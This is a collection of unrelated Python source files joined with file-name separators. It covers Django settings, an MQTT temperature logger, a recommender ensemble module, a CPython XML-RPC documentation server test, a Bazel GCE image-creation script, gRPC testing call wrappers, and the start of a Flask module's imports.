'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
logger.py
|
import time
import re
import socket
import sys
import traceback
import paho.mqtt.client as mqtt
from threading import Thread
class TemperatureLogger:
config = None
mqtt_client = None
mqtt_connected = False
worker = None
# removed as not one of my requirements
#temperatures = {}
def __init__(self, config):
self.config = config
self.wait_update = self.config.get('wait_update', float(60))
self.wait_process = self.config.get('wait_process', float(5))
def verbose(self, message):
if self.config and 'verbose' in self.config and self.config['verbose'] == 'true':
sys.stdout.write('VERBOSE: ' + message + '\n')
sys.stdout.flush()
def error(self, message):
sys.stderr.write('ERROR: ' + message + '\n')
sys.stderr.flush()
def mqtt_connect(self):
if self.mqtt_broker_reachable():
self.verbose('Connecting to ' + self.config['mqtt_host'] + ':' + self.config['mqtt_port'])
self.mqtt_client = mqtt.Client(self.config['mqtt_client_id'])
if 'mqtt_user' in self.config and 'mqtt_password' in self.config:
self.mqtt_client.username_pw_set(self.config['mqtt_user'], self.config['mqtt_password'])
self.mqtt_client.on_connect = self.mqtt_on_connect
self.mqtt_client.on_disconnect = self.mqtt_on_disconnect
try:
self.mqtt_client.connect(self.config['mqtt_host'], int(self.config['mqtt_port']), 60)
self.mqtt_client.loop_forever()
except:
self.error(traceback.format_exc())
self.mqtt_client = None
else:
self.error(self.config['mqtt_host'] + ':' + self.config['mqtt_port'] + ' not reachable!')
def mqtt_on_connect(self, mqtt_client, userdata, flags, rc):
self.mqtt_connected = True
self.verbose('...mqtt_connected!')
def mqtt_on_disconnect(self, mqtt_client, userdata, rc):
self.mqtt_connected = False
self.verbose('Diconnected! will reconnect! ...')
if rc is 0:
self.mqtt_connect()
else:
time.sleep(5)
while not self.mqtt_broker_reachable():
time.sleep(10)
self.mqtt_client.reconnect()
def mqtt_broker_reachable(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
try:
s.connect((self.config['mqtt_host'], int(self.config['mqtt_port'])))
s.close()
return True
except socket.error:
return False
def update(self):
while True:
for source in self.config['sources']:
serial = source['serial']
topic = source['topic']
# added ijm
dev = source['device']
device = open('/sys/bus/w1/devices/' + serial + '/w1_slave')
raw = device.read()
device.close()
match = re.search(r't=([\d]+)', raw)
if match:
temperature_raw = match.group(1)
temperature = round(float(temperature_raw)/1000, 2)
if 'offset' in source:
temperature += float(source['offset'])
self.publish_temperature(topic, temperature, dev)
'''
# the block means only temerature changes are published, my requirement is to publish
# regardless many may want this will look at making it an option
if serial not in self.temperatures or self.temperatures[serial] != temperature:
self.temperatures[serial] = temperature
self.publish_temperature(topic, temperature, dev)'''
self.verbose('Entering wait_process delay of: ' + str(self.wait_process) + ' Seconds')
time.sleep(self.wait_process)
self.verbose('Entering wait_update delay of: ' + str(self.wait_update) + ' Seconds')
time.sleep(self.wait_update)
def publish_temperature(self, topic, temperature, dev):
if self.mqtt_connected:
dev = '{{ "{0}": {1} }}'.format(dev, str(temperature))
self.verbose('Publishing: ' + str(temperature))
self.mqtt_client.publish(topic, dev, 0, True)
def start(self):
self.worker = Thread(target=self.update)
self.worker.setDaemon(True)
self.worker.start()
self.mqtt_connect()
|
ensembles_base.py
|
import warnings
from abc import abstractmethod, ABC
from functools import partial
from itertools import repeat
from multiprocessing import Process, Queue
from multiprocessing.pool import ThreadPool, Pool
from queue import PriorityQueue
from threading import Thread
import numpy as np
import pandas as pd
import scipy.stats
from ml_recsys_tools.recommenders.recommender_base import BaseDFSparseRecommender
from ml_recsys_tools.utils.parallelism import N_CPUS
RANK_COMBINATION_FUNCS = {
'mean': np.mean,
'max': np.max,
'min': np.min,
'gmean': scipy.stats.gmean,
'hmean': scipy.stats.hmean
}
def calc_dfs_and_combine_scores(calc_funcs, groupby_col, item_col, scores_col,
fill_val, combine_func='hmean', n_threads=1,
parallelism='process'):
"""
combine multiple dataframes by voting on prediction rank
:param calc_funcs: functions that return the dataframes to be combined
:param combine_func: defaults 'hmean', the functions that is used to combine the predictions
(can be callable line np.mean or a string that is assumed to be
a key in rank_combination_functions mapping
:param fill_val: rank to be assigned to NaN prediction values
(items appearing in some dataframes but not in others)
:param groupby_col: the column of the entities for which the ranking is calculated (e.g. users)
:param item_col: the column of the entities to be ranked (items)
:param scores_col: the column of the scores to be ranked (predictions)
:param n_threads: number of calculation threads
:param parallelism: type of parallelism (processes or threads)
:return: a combined dataframe of the same format as the dataframes created by the calc_funcs
"""
# set up
multiproc = 'process' in parallelism
_END = 'END'
q_in = Queue()
q_out = Queue() if multiproc else PriorityQueue()
rank_cols = ['rank_' + str(i) for i in range(len(calc_funcs))]
n_jobs = len(calc_funcs)
n_workers = min(n_threads, n_jobs)
if not callable(combine_func):
combine_func = RANK_COMBINATION_FUNCS[combine_func]
jitter = lambda: np.random.rand()
def _calc_df_and_add_rank_score(i):
df = calc_funcs[i]()
df = df.drop_duplicates()
# another pandas bug workaround
df[groupby_col] = df[groupby_col].astype(str, copy=False)
df[item_col] = df[item_col].astype(str, copy=False)
df[scores_col] = df[scores_col].astype(float, copy=False)
df = df.reset_index(drop=True) # resetting index due to pandas bug
df[rank_cols[i]] = df. \
groupby(groupby_col)[scores_col].\
rank(ascending=False)
df = df.drop(scores_col, axis=1).set_index([groupby_col, item_col])
q_out.put((len(df) + jitter(), df))
def _joiner():
while True:
_, df1 = q_out.get()
if isinstance(df1, str) and df1 == _END:
break
_, df2 = q_out.get()
if isinstance(df2, str) and df2 == _END:
q_out.put((len(df1) + jitter(), df1)) # put it back
break
df_joined = df2.join(df1, how='outer')
q_out.put((len(df_joined) + jitter(), df_joined))
def _worker():
i = q_in.get()
while i != _END:
_calc_df_and_add_rank_score(i)
i = q_in.get()
if multiproc:
workers = [Process(target=_worker) for _ in range(n_workers)]
else:
workers = [Thread(target=_worker) for _ in range(n_workers)]
joiner = Thread(target=_joiner)
# submit and start jobs
[q_in.put(i) for i in range(n_jobs)] + [q_in.put(_END) for _ in range(n_workers)]
[j.start() for j in workers + [joiner]]
[j.join() for j in workers]
# stop joiner after workers are done by putting END token
q_out.put((0, _END))
joiner.join()
# final reduce (faster to join in couples rather one by one)
while q_out.qsize() > 1:
_, df1 = q_out.get()
_, df2 = q_out.get()
df_joined = df2.join(df1, how='outer')
q_out.put((len(df_joined), df_joined))
# get final result
_, merged_df = q_out.get()
merged_df.fillna(fill_val, inplace=True)
# combine ranks
merged_df[scores_col] = combine_func(1 / merged_df[rank_cols].values, axis=1)
# drop temp cols
merged_df.drop(rank_cols, axis=1, inplace=True)
return merged_df.reset_index()
class EnsembleBase(BaseDFSparseRecommender):
def __init__(self,
combination_mode='hmean',
na_rank_fill=None,
**kwargs):
self.combination_mode = combination_mode
self.na_rank_fill = na_rank_fill
self.recommenders = []
super().__init__(**kwargs)
def n_concurrent(self):
return N_CPUS
def set_params(self, **params):
params = self._pop_set_params(params, ['combination_mode', 'na_rank_fill'])
# set on self
super().set_params(**params.copy())
def _get_recommendations_flat(self, user_ids, item_ids, n_rec=100, **kwargs):
calc_funcs = [
partial(
rec.get_recommendations,
user_ids=user_ids, item_ids=item_ids,
n_rec=n_rec, results_format='flat', **kwargs)
for rec in self.recommenders]
recos_flat = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=self.na_rank_fill if self.na_rank_fill else (n_rec + 1),
groupby_col=self._user_col,
item_col=self._item_col,
scores_col=self._prediction_col,
n_threads=self.n_concurrent()
)
return recos_flat
def get_similar_items(self, item_ids=None, target_item_ids=None, n_simil=10,
n_unfilt=100, results_format='lists', **kwargs):
calc_funcs = [partial(rec.get_similar_items,
item_ids=item_ids, target_item_ids=target_item_ids,
n_simil=n_unfilt, results_format='flat', **kwargs)
for rec in self.recommenders]
combined_simil_df = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=self.na_rank_fill if self.na_rank_fill else (n_unfilt + 1),
groupby_col=self._item_col_simil,
item_col=self._item_col,
scores_col=self._prediction_col)
return combined_simil_df if results_format == 'flat' \
else self._simil_flat_to_lists(combined_simil_df, n_cutoff=n_simil)
def _predict_on_inds_dense(self, user_inds, item_inds):
raise NotImplementedError()
def predict_for_user(self, user_id, item_ids, rank_training_last=True,
sort=True, combine_original_order=False):
calc_funcs = [
partial(
rec.predict_for_user,
user_id=user_id,
item_ids=item_ids,
rank_training_last=rank_training_last,
combine_original_order=combine_original_order,
)
for rec in self.recommenders]
df = calc_dfs_and_combine_scores(
calc_funcs=calc_funcs,
combine_func=self.combination_mode,
fill_val=len(item_ids),
groupby_col=self._user_col,
item_col=self._item_col,
scores_col=self._prediction_col,
n_threads=N_CPUS,
parallelism='thread'
)
if sort:
df.sort_values(self._prediction_col, ascending=False, inplace=True)
return df
class SubdivisionEnsembleBase(EnsembleBase):
def __init__(self,
n_recommenders=1,
concurrence_ratio=0.3,
concurrency_backend='threads',
**kwargs):
self.n_recommenders = n_recommenders
self.concurrence_ratio = concurrence_ratio
self.concurrency_backend = concurrency_backend
super().__init__(**kwargs)
self.sub_class_type = None
self._init_recommenders()
def get_workers_pool(self, concurrency_backend=None):
if concurrency_backend is None:
concurrency_backend = self.concurrency_backend
if 'thread' in concurrency_backend:
return ThreadPool(self.n_concurrent())
elif 'proc' in concurrency_backend:
return Pool(self.n_concurrent(), maxtasksperchild=3)
def _init_recommenders(self, **params):
self.recommenders = [self.sub_class_type(**params.copy())
for _ in range(self.n_recommenders)]
def n_concurrent(self):
return int(min(np.ceil(len(self.recommenders) * self.concurrence_ratio), N_CPUS))
def set_params(self, **params):
params = self._pop_set_params(
params, ['n_recommenders', 'concurrence_ratio'])
# set on self
super().set_params(**params.copy())
# init sub models to make sure they're the right object already
self._init_recommenders(**self.model_params)
# # set for each sub_model
# for model in self.recommenders:
# # model.set_params(**params.copy())
# model.set_params()
@abstractmethod
def _generate_sub_model_train_data(self, train_obs):
pass
@abstractmethod
def _fit_sub_model(self, args):
pass
def fit(self, train_obs, **fit_params):
self._set_data(train_obs)
sub_model_train_data_generator = self._generate_sub_model_train_data(train_obs)
n_recommenders = self.n_recommenders
with self.get_workers_pool() as pool:
self.recommenders = list(
pool.imap(self._fit_sub_model,
zip(range(n_recommenders),
sub_model_train_data_generator,
repeat(fit_params, n_recommenders))))
return self
# def sub_model_evaluations(self, test_dfs, test_names, include_train=True):
# stats = []
# reports = []
# for m in self.recommenders:
# users = m.train_df[self.train_obs.uid_col].unique()
# items = m.train_df[self.train_obs.iid_col].unique()
# sub_test_dfs = [df[df[self.train_obs.uid_col].isin(users) &
# df[self.train_obs.iid_col].isin(items)] for df in test_dfs]
# lfm_report = m.eval_on_test_by_ranking(
# include_train=include_train,
# test_dfs=sub_test_dfs,
# prefix='lfm sub model',
# test_names=test_names
# )
# stats.append('train: %d, test: %s' %
# (len(m.train_df), [len(df) for df in sub_test_dfs]))
# reports.append(lfm_report)
# return stats, reports
class CombinationEnsembleBase(EnsembleBase):
def __init__(self, recommenders, **kwargs):
super().__init__(**kwargs)
self.recommenders = recommenders
self._reuse_data(self.recommenders[0])
def fit(self, *args, **kwargs):
warnings.warn('Fit is not supported, recommenders should already be fitted.')
|
test_docxmlrpc.py
|
from xmlrpc.server import DocXMLRPCServer
import http.client
import sys
from test import support
threading = support.import_module('threading')
import time
import socket
import unittest
PORT = None
def make_request_and_skipIf(condition, reason):
# If we skip the test, we have to make a request because
# the server created in setUp blocks expecting one to come in.
if not condition:
return lambda func: func
def decorator(func):
def make_request_and_skip(self):
self.client.request("GET", "/")
self.client.getresponse()
raise unittest.SkipTest(reason)
return make_request_and_skip
return decorator
def server(evt, numrequests):
serv = DocXMLRPCServer(("localhost", 0), logRequests=False)
try:
global PORT
PORT = serv.socket.getsockname()[1]
# Add some documentation
serv.set_server_title("DocXMLRPCServer Test Documentation")
serv.set_server_name("DocXMLRPCServer Test Docs")
serv.set_server_documentation(
"This is an XML-RPC server's documentation, but the server "
"can be used by POSTing to /RPC2. Try self.add, too.")
# Create and register classes and functions
class TestClass(object):
def test_method(self, arg):
"""Test method's docs. This method truly does very little."""
self.arg = arg
serv.register_introspection_functions()
serv.register_instance(TestClass())
def add(x, y):
"""Add two instances together. This follows PEP008, but has nothing
to do with RFC1952. Case should matter: pEp008 and rFC1952. Things
that start with http and ftp should be auto-linked, too:
http://google.com.
"""
return x + y
def annotation(x: int):
""" Use function annotations. """
return x
class ClassWithAnnotation:
def method_annotation(self, x: bytes):
return x.decode()
serv.register_function(add)
serv.register_function(lambda x, y: x-y)
serv.register_function(annotation)
serv.register_instance(ClassWithAnnotation())
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.server_close()
PORT = None
evt.set()
class DocXMLRPCHTTPGETServer(unittest.TestCase):
def setUp(self):
self._threads = support.threading_setup()
# Enable server feedback
DocXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
threading.Thread(target=server, args=(self.evt, 1)).start()
# wait for port to be assigned
deadline = time.monotonic() + 10.0
while PORT is None:
time.sleep(0.010)
if time.monotonic() > deadline:
break
self.client = http.client.HTTPConnection("localhost:%d" % PORT)
def tearDown(self):
self.client.close()
self.evt.wait()
# Disable server feedback
DocXMLRPCServer._send_traceback_header = False
support.threading_cleanup(*self._threads)
def test_valid_get_response(self):
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertEqual(response.status, 200)
self.assertEqual(response.getheader("Content-type"), "text/html")
# Server raises an exception if we don't start to read the data
response.read()
def test_invalid_get_response(self):
self.client.request("GET", "/spam")
response = self.client.getresponse()
self.assertEqual(response.status, 404)
self.assertEqual(response.getheader("Content-type"), "text/plain")
response.read()
def test_lambda(self):
"""Test that lambda functionality stays the same. The output produced
currently is, I suspect invalid because of the unencoded brackets in the
HTML, "<lambda>".
The subtraction lambda method is tested.
"""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn((b'<dl><dt><a name="-<lambda>"><strong>'
b'<lambda></strong></a>(x, y)</dt></dl>'),
response.read())
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_autolinking(self):
"""Test that the server correctly automatically wraps references to
PEPS and RFCs with links, and that it linkifies text starting with
http or ftp protocol prefixes.
The documentation for the "add" method contains the test material.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-add"><strong>add</strong></a>(x, y)</dt><dd>'
b'<tt>Add two instances together. This '
b'follows <a href="http://www.python.org/dev/peps/pep-0008/">'
b'PEP008</a>, but has nothing<br>\nto do '
b'with <a href="http://www.rfc-editor.org/rfc/rfc1952.txt">'
b'RFC1952</a>. Case should matter: pEp008 '
b'and rFC1952. Things<br>\nthat start '
b'with http and ftp should be '
b'auto-linked, too:<br>\n<a href="http://google.com">'
b'http://google.com</a>.</tt></dd></dl>'), response)
@make_request_and_skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_system_methods(self):
"""Test the precense of three consecutive system.* methods.
This also tests their use of parameter type recognition and the
systems related to that process.
"""
self.client.request("GET", "/")
response = self.client.getresponse().read()
self.assertIn(
(b'<dl><dt><a name="-system.methodHelp"><strong>system.methodHelp'
b'</strong></a>(method_name)</dt><dd><tt><a href="#-system.method'
b'Help">system.methodHelp</a>(\'add\') => "Adds '
b'two integers together"<br>\n <br>\nReturns a'
b' string containing documentation for '
b'the specified method.</tt></dd></dl>\n<dl><dt><a name'
b'="-system.methodSignature"><strong>system.methodSignature</strong>'
b'</a>(method_name)</dt><dd><tt><a href="#-system.methodSignature">'
b'system.methodSignature</a>(\'add\') => [double, '
b'int, int]<br>\n <br>\nReturns a list '
b'describing the signature of the method.'
b' In the<br>\nabove example, the add '
b'method takes two integers as arguments'
b'<br>\nand returns a double result.<br>\n '
b'<br>\nThis server does NOT support system'
b'.methodSignature.</tt></dd></dl>'), response)
def test_autolink_dotted_methods(self):
"""Test that selfdot values are made strong automatically in the
documentation."""
self.client.request("GET", "/")
response = self.client.getresponse()
self.assertIn(b"""Try self.<strong>add</strong>, too.""",
response.read())
def test_annotations(self):
""" Test that annotations works as expected """
self.client.request("GET", "/")
response = self.client.getresponse()
docstring = (b'' if sys.flags.optimize >= 2 else
b'<dd><tt>Use function annotations.</tt></dd>')
self.assertIn(
(b'<dl><dt><a name="-annotation"><strong>annotation</strong></a>'
b'(x: int)</dt>' + docstring + b'</dl>\n'
b'<dl><dt><a name="-method_annotation"><strong>'
b'method_annotation</strong></a>(x: bytes)</dt></dl>'),
response.read())
def test_main():
support.run_unittest(DocXMLRPCHTTPGETServer)
if __name__ == '__main__':
test_main()
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
IMAGE_CREATION_VMS = {
"bk-testing-docker": {
"project": "bazel-public",
"zone": "us-central1-f",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-2004-lts",
"setup_script": "setup-docker.sh",
"guest_os_features": ["VIRTIO_SCSI_MULTIQUEUE"],
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-testing-windows": {
"project": "bazel-public",
"zone": "us-central1-f",
"source_image_project": "windows-cloud",
"source_image_family": "windows-20h2-core",
"setup_script": "setup-windows.ps1",
"guest_os_features": ["VIRTIO_SCSI_MULTIQUEUE"],
},
"windows-playground": {
"project": "di-cloud-exp",
"zone": "us-central1-f",
"network": "default",
"source_image_project": "windows-cloud",
"source_image_family": "windows-2019",
"setup_script": "setup-windows.ps1",
"guest_os_features": ["VIRTIO_SCSI_MULTIQUEUE"],
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
def create_instance(instance_name, params):
is_windows = "windows" in instance_name
setup_script = preprocess_setup_script(params["setup_script"], is_windows)
try:
if is_windows:
startup_script = "windows-startup-script-ps1=" + setup_script
else:
startup_script = "startup-script=" + setup_script
if "source_image" in params:
image = {"image": params["source_image"]}
else:
image = {
"image-project": params["source_image_project"],
"image-family": params["source_image_family"],
}
gcloud.create_instance(
instance_name,
project=params["project"],
zone=params["zone"],
machine_type="c2-standard-8",
network=params.get("network", "default"),
metadata_from_file=startup_script,
boot_disk_type="pd-ssd",
boot_disk_size=params.get("boot_disk_size", "500GB"),
**image,
)
finally:
os.remove(setup_script)
# https://stackoverflow.com/a/25802742
def write_to_clipboard(output):
process = subprocess.Popen("pbcopy", env={"LANG": "en_US.UTF-8"}, stdin=subprocess.PIPE)
process.communicate(output.encode("utf-8"))
def print_windows_instructions(project, zone, instance_name):
tail_start = gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, until="Finished running startup scripts"
)
pw = json.loads(
gcloud.reset_windows_password(
instance_name, format="json", project=project, zone=zone
).stdout
)
rdp_file = tempfile.mkstemp(suffix=".rdp")[1]
with open(rdp_file, "w") as f:
f.write("full address:s:" + pw["ip_address"] + "\n")
f.write("username:s:" + pw["username"] + "\n")
subprocess.run(["open", rdp_file])
write_to_clipboard(pw["password"])
with gcloud.PRINT_LOCK:
print("Use this password to connect to the Windows VM: " + pw["password"])
print("Please run the setup script C:\\setup.ps1 once you're logged in.")
# Wait until the VM reboots once, then open RDP again.
tail_start = gcloud_utils.tail_serial_console(
instance_name,
project=project,
zone=zone,
start=tail_start,
until="GCEGuestAgent: GCE Agent Started",
)
print("Connecting via RDP a second time to finish the setup...")
write_to_clipboard(pw["password"])
run(["open", rdp_file])
return tail_start
def workflow(name, params):
instance_name = "%s-image-%s" % (name, int(datetime.now().timestamp()))
project = params["project"]
zone = params["zone"]
try:
# Create the VM.
create_instance(instance_name, params)
# Wait for the VM to become ready.
gcloud_utils.wait_for_instance(instance_name, project=project, zone=zone, status="RUNNING")
if "windows" in instance_name:
# Wait for VM to be ready, then print setup instructions.
tail_start = print_windows_instructions(project, zone, instance_name)
# Continue printing the serial console until the VM shuts down.
gcloud_utils.tail_serial_console(
instance_name, project=project, zone=zone, start=tail_start
)
else:
# Continuously print the serial console.
gcloud_utils.tail_serial_console(instance_name, project=project, zone=zone)
# Wait for the VM to completely shutdown.
gcloud_utils.wait_for_instance(
instance_name, project=project, zone=zone, status="TERMINATED"
)
# Create a new image from our VM.
gcloud.create_image(
instance_name,
project=project,
family=name,
source_disk=instance_name,
source_disk_zone=zone,
licenses=params.get("licenses", []),
guest_os_features=params.get("guest_os_features", []),
)
finally:
gcloud.delete_instance(instance_name, project=project, zone=zone)
def worker():
while True:
item = WORK_QUEUE.get()
if not item:
break
try:
workflow(**item)
finally:
WORK_QUEUE.task_done()
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
if not argv:
print("Usage: create_images.py {}".format(" ".join(IMAGE_CREATION_VMS.keys())))
return 1
unknown_args = set(argv).difference(IMAGE_CREATION_VMS.keys())
if unknown_args:
print(
"Unknown platforms: {}\nAvailable platforms: {}".format(
", ".join(unknown_args), ", ".join(IMAGE_CREATION_VMS.keys())
)
)
return 1
# Put VM creation instructions into the work queue.
for name in argv:
WORK_QUEUE.put({"name": name, "params": IMAGE_CREATION_VMS[name]})
# Spawn worker threads that will create the VMs.
threads = []
for _ in range(WORK_QUEUE.qsize()):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
# Wait for all VMs to be created.
WORK_QUEUE.join()
# Signal worker threads to exit.
for _ in range(len(threads)):
WORK_QUEUE.put(None)
# Wait for worker threads to exit.
for t in threads:
t.join()
return 0
if __name__ == "__main__":
sys.exit(main())
|
_invocation.py
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import grpc
_NOT_YET_OBSERVED = object()
logging.basicConfig()
_LOGGER = logging.getLogger(__name__)
def _cancel(handler):
return handler.cancel(grpc.StatusCode.CANCELLED, 'Locally cancelled!')
def _is_active(handler):
return handler.is_active()
def _time_remaining(unused_handler):
raise NotImplementedError()
def _add_callback(handler, callback):
return handler.add_callback(callback)
def _initial_metadata(handler):
return handler.initial_metadata()
def _trailing_metadata(handler):
trailing_metadata, unused_code, unused_details = handler.termination()
return trailing_metadata
def _code(handler):
unused_trailing_metadata, code, unused_details = handler.termination()
return code
def _details(handler):
unused_trailing_metadata, unused_code, details = handler.termination()
return details
class _Call(grpc.Call):
def __init__(self, handler):
self._handler = handler
def cancel(self):
_cancel(self._handler)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
class _RpcErrorCall(grpc.RpcError, grpc.Call):
def __init__(self, handler):
self._handler = handler
def cancel(self):
_cancel(self._handler)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
def _next(handler):
read = handler.take_response()
if read.code is None:
return read.response
elif read.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise _RpcErrorCall(handler)
class _HandlerExtras(object):
def __init__(self):
self.condition = threading.Condition()
self.unary_response = _NOT_YET_OBSERVED
self.cancelled = False
def _with_extras_cancel(handler, extras):
with extras.condition:
if handler.cancel(grpc.StatusCode.CANCELLED, 'Locally cancelled!'):
extras.cancelled = True
return True
else:
return False
def _extras_without_cancelled(extras):
with extras.condition:
return extras.cancelled
def _running(handler):
return handler.is_active()
def _done(handler):
return not handler.is_active()
def _with_extras_unary_response(handler, extras):
with extras.condition:
if extras.unary_response is _NOT_YET_OBSERVED:
read = handler.take_response()
if read.code is None:
extras.unary_response = read.response
return read.response
else:
raise _RpcErrorCall(handler)
else:
return extras.unary_response
def _exception(unused_handler):
raise NotImplementedError('TODO!')
def _traceback(unused_handler):
raise NotImplementedError('TODO!')
def _add_done_callback(handler, callback, future):
adapted_callback = lambda: callback(future)
if not handler.add_callback(adapted_callback):
callback(future)
class _FutureCall(grpc.Future, grpc.Call):
def __init__(self, handler, extras):
self._handler = handler
self._extras = extras
def cancel(self):
return _with_extras_cancel(self._handler, self._extras)
def cancelled(self):
return _extras_without_cancelled(self._extras)
def running(self):
return _running(self._handler)
def done(self):
return _done(self._handler)
def result(self):
return _with_extras_unary_response(self._handler, self._extras)
def exception(self):
return _exception(self._handler)
def traceback(self):
return _traceback(self._handler)
def add_done_callback(self, fn):
_add_done_callback(self._handler, fn, self)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
def consume_requests(request_iterator, handler):
def _consume():
while True:
try:
request = next(request_iterator)
added = handler.add_request(request)
if not added:
break
except StopIteration:
handler.close_requests()
break
except Exception: # pylint: disable=broad-except
details = 'Exception iterating requests!'
_LOGGER.exception(details)
handler.cancel(grpc.StatusCode.UNKNOWN, details)
consumption = threading.Thread(target=_consume)
consumption.start()
def blocking_unary_response(handler):
read = handler.take_response()
if read.code is None:
unused_trailing_metadata, code, unused_details = handler.termination()
if code is grpc.StatusCode.OK:
return read.response
else:
raise _RpcErrorCall(handler)
else:
raise _RpcErrorCall(handler)
def blocking_unary_response_with_call(handler):
read = handler.take_response()
if read.code is None:
unused_trailing_metadata, code, unused_details = handler.termination()
if code is grpc.StatusCode.OK:
return read.response, _Call(handler)
else:
raise _RpcErrorCall(handler)
else:
raise _RpcErrorCall(handler)
def future_call(handler):
return _FutureCall(handler, _HandlerExtras())
class ResponseIteratorCall(grpc.Call):
def __init__(self, handler):
self._handler = handler
def __iter__(self):
return self
def __next__(self):
return _next(self._handler)
def next(self):
return _next(self._handler)
def cancel(self):
_cancel(self._handler)
def is_active(self):
return _is_active(self._handler)
def time_remaining(self):
return _time_remaining(self._handler)
def add_callback(self, callback):
return _add_callback(self._handler, callback)
def initial_metadata(self):
return _initial_metadata(self._handler)
def trailing_metadata(self):
return _trailing_metadata(self._handler)
def code(self):
return _code(self._handler)
def details(self):
return _details(self._handler)
|
datasets.py
|
from flask import request
from flask_restplus import Namespace, Resource, reqparse, inputs
from flask_login import login_required, current_user
from werkzeug.datastructures import FileStorage
from mongoengine.errors import NotUniqueError
from mongoengine.queryset.visitor import Q
